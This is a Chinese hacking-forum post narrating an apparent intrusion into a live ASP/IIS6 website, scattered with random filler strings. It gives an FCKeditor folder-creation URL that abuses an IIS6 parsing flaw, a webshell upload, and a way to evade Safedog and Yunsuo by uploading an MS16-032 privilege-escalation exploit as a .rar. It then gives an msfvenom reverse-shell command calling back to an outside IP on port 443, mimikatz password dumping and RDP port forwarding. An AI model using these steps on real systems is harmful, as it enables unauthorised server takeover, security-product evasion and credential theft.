找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2184|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 Y: _# Q3 k/ x( Q: Z j) C

5 ]+ c) ^: E8 X: h, V* E% x+ P6 A# R7 f& O! m5 m( t+ E* w) X2 D J+ \2 y7 F$ r- k. i0 A6 R& H8 ^# g3 f7 U- h- @) h- _7 C/ L4 b* v
! ~1 U# I7 h+ [ y) f

3 I# a3 M- Z7 Q5 e* ?8 _6 v
2 ]2 y2 a8 }4 n* G6 w2 _: L8 r
一、 利用getwebshell
6 ]! M8 ~& S( l% P9 l' U9 {
1 T9 C7 A4 I. o" k2 ~# |
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
+ `! U6 L: e, ^: P- k
: Y! R- O7 M9 _222.png
6 h; ^" _) h' v
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
' Y# c3 c$ l j! e* b' r% n 333.png
4 Z Y* R E1 f- `; \. f0 i
下面我们构造一个asp目录,如: # N9 `+ I' i! i$ \ E' Q

1 G9 x# U4 o5 P8 ~

9 w6 u0 }! g" L http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 9 n! X1 B, p0 ^, X5 K L

, Q0 _, m* J2 r% q8 p/ U. D4 |

h( p- s' X7 H: c; Y6 k5 n( S 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
: n& x8 g; V0 `3 y* L! T
: Q+ X" R+ A1 [/ b7 N: o
一、 绕过安全狗云锁提权并且加账号
: \7 L. a7 L5 x F) d' r3 R 444.png
' V& e/ f U, i" A; z! {
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
7 s! l# O$ P" |8 U+ G0 c' ^5 |* Z
# q$ ?: G: S( {
如图:
6 X- l/ r# {# M p7 ^0 y 555.png
1 l( ?6 D- p q, n
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
5 E+ |3 ]1 x m: ], U& H. m# h
4 n; V1 W$ M. s( }3 t- e' c5 p6 L( g
一、 利用metasploit
! h, V; l3 g3 \8 d% G" o' }
: T% @+ N3 [( N3 W2 C
首先用pentestbox生成一个64位的payload如下命令
( G, `0 w7 b4 O0 n3 M* b" P
K7 v& i" o5 ~% U5 CmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
C+ Q: z( [# `( Q
9 e! \" ]# L/ L: Q- ]9 T# @& U% U
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
2 J) h* g/ M$ B3 {6 L! a11.png
1 }+ e& E3 P) O& c
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
( E3 ~5 N5 Y; i- o( b' o# y, t; L. o$ W 13.png
; C1 y$ Q/ X. D! l R
下面我们来做一个监听如下命令:
7 {$ d5 g- ?! V" p
7 b `$ w& @# U, gportfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
# X, R+ O* P6 Y$ ?" N/ B$ K" c 18.png
D- J: O# ^% s. s6 w- R; ?# D

Z d) a X' @6 i; @" s% s
6 _" ^- b" y' l, P- P, G/ c

, |, Y% b# O; |8 s. o* N

+ ~0 P4 Y- y3 w5 _: n1 `9 e
1 {& r8 ^2 M% E" R
- Q! X+ z3 [& o) _. A
; D; r) t; Q2 X5 L8 L( v8 z# y/ X

$ t/ p% ]+ W- [3 j
; p- w/ ?5 b/ E$ T+ \1 B 3 U% j' @( e: `0 q

, B' L$ d' e6 W! f" ?: A
4 x1 c0 R& [1 Q d4 Z+ N

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表